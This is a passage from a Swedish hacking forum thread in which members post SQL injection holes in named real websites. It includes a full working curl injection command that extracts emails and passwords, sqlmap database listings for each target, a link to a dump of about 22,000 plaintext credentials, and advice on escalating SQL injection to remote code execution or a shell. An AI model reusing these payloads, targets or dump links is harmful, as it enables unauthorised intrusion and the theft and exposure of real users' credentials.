2014-08-18, 15:01
  #4405
Medlem
Citat:
Ursprungligen postat av Andreas1989
http://3w.se/vote.php

Post data: vs=0&adddbid=12259&register=R%F6sta

"vs" är den sårbara variablen.

33851 domäner/konton med klartext lösenord

available databases [4]:
  • dme_3w2
  • information_schema
  • mysql
  • test

adddbid var sårbar med error based.

Rörig query, tog från sqlmap och modifierade:
Kod:
curl -X POST --data "vs=0&adddbid=12259' AND (SELECT 4520 FROM(SELECT COUNT(*),CONCAT(0x717a6c7571,(SELECT CONCAT(MID(email,1,60), 0x3a, MID(pwd,1,50)) FROM dme_3w2.multihosts ORDER BY id LIMIT ${i},1),0x7161617171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ItdJ'='ItdJ&register=Rösta" http://3w.se/vote.php


22481 unika rader, runt 20-30 rader bortgick på grund av att de var för långa, orkade inte hämta dessa manuellt. Om någon är i behov av exakt alla kan jag skicka raw-dumpen så får den hämta trasiga raderna själv.

Dump:
https://anonfiles.com/file/01434edd0c711475fd86c31b52231481

Teckenkodningen sket sig lite, tror dock jag räddat det mesta, möjligt det finns något kodfel kvar.
Citera
2014-08-18, 18:45
  #4406
Medlem
Citat:
Ursprungligen postat av Abnormius
adddbid var sårbar med error based.

Rörig query, tog från sqlmap och modifierade:
Kod:
curl -X POST --data "vs=0&adddbid=12259' AND (SELECT 4520 FROM(SELECT COUNT(*),CONCAT(0x717a6c7571,(SELECT CONCAT(MID(email,1,60), 0x3a, MID(pwd,1,50)) FROM dme_3w2.multihosts ORDER BY id LIMIT ${i},1),0x7161617171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ItdJ'='ItdJ&register=Rösta" http://3w.se/vote.php


22481 unika rader, runt 20-30 rader bortgick på grund av att de var för långa, orkade inte hämta dessa manuellt. Om någon är i behov av exakt alla kan jag skicka raw-dumpen så får den hämta trasiga raderna själv.

Dump:
https://anonfiles.com/file/01434edd0c711475fd86c31b52231481

Teckenkodningen sket sig lite, tror dock jag räddat det mesta, möjligt det finns något kodfel kvar.

Japp det är korrekt, adddbid är den sårbara variablen. Måste ha sett fel eller nåt.

Dumpade också sidan och konverterade den till en .SQL fil för att hitta saker lättare. Teckenkodningen är rätt jobbig speciellt om man parsar med Python och programmet krashar så fort den ser något konstigt tecken :P
Citera
2014-08-18, 19:00
  #4407
Medlem
Nytt-kontos avatar
Citat:
Ursprungligen postat av .Chloe
Haha, bara till att ignorera IDG då mycket större sidor har hackats i denna tråd. Antagligen har IDG eller deras kunder en relation till Allabolag så det är en riktad nyhet.

F.ö har allabolag hackats innan.
Har ett svagt minne av att jag fick ut väldigt mycket inloggningar när jag hackade den för några år sen men nu påstår dom att dom inte ens blivit av med några känsliga uppgifter

Citat:
Henrik Tellving • 3 hours ago

Hej. Vi kan från allabolag.se:s sida dementera att några inloggningsuppgifter/lösenord har kommit ut. Enbart delar av viss officiell företagsinformation/nyhetstjänst är det som är drabbat av intrånget. Felet är nu åtgärdat.
MVH Henrik Tellving Marknadschef på UC allabolag AB
Citera
2014-08-18, 20:43
  #4408
Medlem
Citat:
Ursprungligen postat av Nytt-konto
Har ett svagt minne av att jag fick ut väldigt mycket inloggningar när jag hackade den för några år sen men nu påstår dom att dom inte ens blivit av med några känsliga uppgifter
Jag hann aldrig utforska hålet själv, men har frågat ett par efter dumpen, båda sa att de inte hittade något intressant.

Så förmodligen var det bara mindre känsliga scheman som gick att komma åt med användaren som skötte den sårbara queryn.

De kanske har satt upp lite vettigare rättigheter denna gång
Citera
2014-08-19, 01:09
  #4409
Medlem
Nytt-kontos avatar
Citat:
Ursprungligen postat av Abnormius
Jag hann aldrig utforska hålet själv, men har frågat ett par efter dumpen, båda sa att de inte hittade något intressant.

Så förmodligen var det bara mindre känsliga scheman som gick att komma åt med användaren som skötte den sårbara queryn.

De kanske har satt upp lite vettigare rättigheter denna gång
Mycket möjligt men enligt personen som posta den så såg man ut att komma åt MYSQL databasen som åtminstone borde innehålla lösen och därifrån kan man ju komma rätt långt
Citera
2014-08-19, 03:41
  #4410
Medlem
Assyrens avatar
Citat:
Ursprungligen postat av butkus
http://www.eurogold.se/mainpage.php?page=proList&group=Dia_Lager&meny_act ive=meny_act_6&sub_active=sub_act_6_5

MySQL UNION query (NULL) - 3 columns
  • available databases [2]:
  • eurogold_se
  • information_schema


fungerar ej?
Citera
2014-08-19, 09:59
  #4411
Medlem
Citat:
Ursprungligen postat av Assyren
fungerar ej?

Du kan använda en annan string
http://www.eurogold.se/mainpage.php?page=proList&group=

Dock är inte password i klartext.

100% creds går tlll my man butkus!
__________________
Senast redigerad av tholbox 2014-08-19 kl. 10:58.
Citera
2014-08-19, 11:41
  #4412
Medlem
Citat:
Ursprungligen postat av Nytt-konto
Mycket möjligt men enligt personen som posta den så såg man ut att komma åt MYSQL databasen som åtminstone borde innehålla lösen och därifrån kan man ju komma rätt långt
En databas är uppbyggd av scheman och tabeller. Att du kommer åt databasen betyder inte att du kan komma åt alla scheman och tabeller.

En säker sida har fler mysql-användare. En mysql-användare som har tillgång till känsliga scheman, t.ex. lösenord, och en annan mycket mer begränsad som har tillgång till information som visas på sajten.

Sitter säkerhetshålet i en query som körs av den begränsade användaren kommer du då inte åt någon känslig information. Det är förmodligen en sådan query som påverkades i detta fall. Den användaren har inte åtkomst till de scheman och tabeller med känslig information, därav läckte inget.
Citera
2014-08-19, 11:44
  #4413
Medlem
.Chloes avatar
Citat:
Ursprungligen postat av Nytt-konto
Mycket möjligt men enligt personen som posta den så såg man ut att komma åt MYSQL databasen som åtminstone borde innehålla lösen och därifrån kan man ju komma rätt långt
Att kunna logga in på databasen utanför localhost är inte vanligt, även om det är möjligt så är det sällan man får göra det som root. Det som är så bra är ju att man kan kolla upp vilken användare som tillåts att få ansluta utanför det interna nätverket för att sedan välja att knäcka användarens hash. Kolla in kolumnen 'Host' i Mysql.user för att få reda på rättigheterna.

Försök skaffa RCE eller ett shell på hosten, därefter kommer dina kommando tolkas som att komma från localhost och du kan fiffla runt som root i databasen. Finns bra exempel där SQLi blev till RCE, faktum är att sqlmap erbjuder att skiva en fil på servern(--file-write=).

Citat:
Ursprungligen postat av Abnormius
En säker sida har fler mysql-användare. En mysql-användare som har tillgång till känsliga scheman, t.ex. lösenord, och en annan mycket mer begränsad som har tillgång till information som visas på sajten.
Japp, detta är god säkerhet. Men de flesta brukar enbart ha två användare, root och den andra som används i webbapplikationen. Det som skiljer root och den andra användaren är inte så värst mycket, typ att drop inte får användas.
__________________
Senast redigerad av .Chloe 2014-08-19 kl. 11:48.
Citera
2014-08-19, 15:43
  #4414
Medlem
http://autopartsmarket.eu/?action=catalog_detail_model_view&data[id_make]=746&data[id_model]=4855

MySQL UNION query (123) - 13 columns
  • available databases [5]:
  • information_schema
  • sts
  • tecdoc_1103
  • tecdoc_1301
  • tecdoc_1303

Count of sts.user_customer is 61483
Citera
2014-08-19, 19:07
  #4415
Medlem
http://www.mattiasribbing.se/blogg_kommentar.php?Vald=155

Alltid kul att se vad vår minnesmästare valt för lösenord. Ett bra lösenord faktiskt, synd att han glömt att hasha det


Info om paths finns här:
http://www.mattiasribbing.se/images/

Hittar dock inget roligt att göra med informationen.
Citera
2014-08-20, 09:50
  #4416
Medlem
http://www.laromedia.se/restnotering/index.php?isbn=

MySQL UNION query (NULL) - 4 columns
  • available databases [5]:
  • information_schema
  • mysql
  • performance_schema
  • test
  • Webbshop
Citera

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in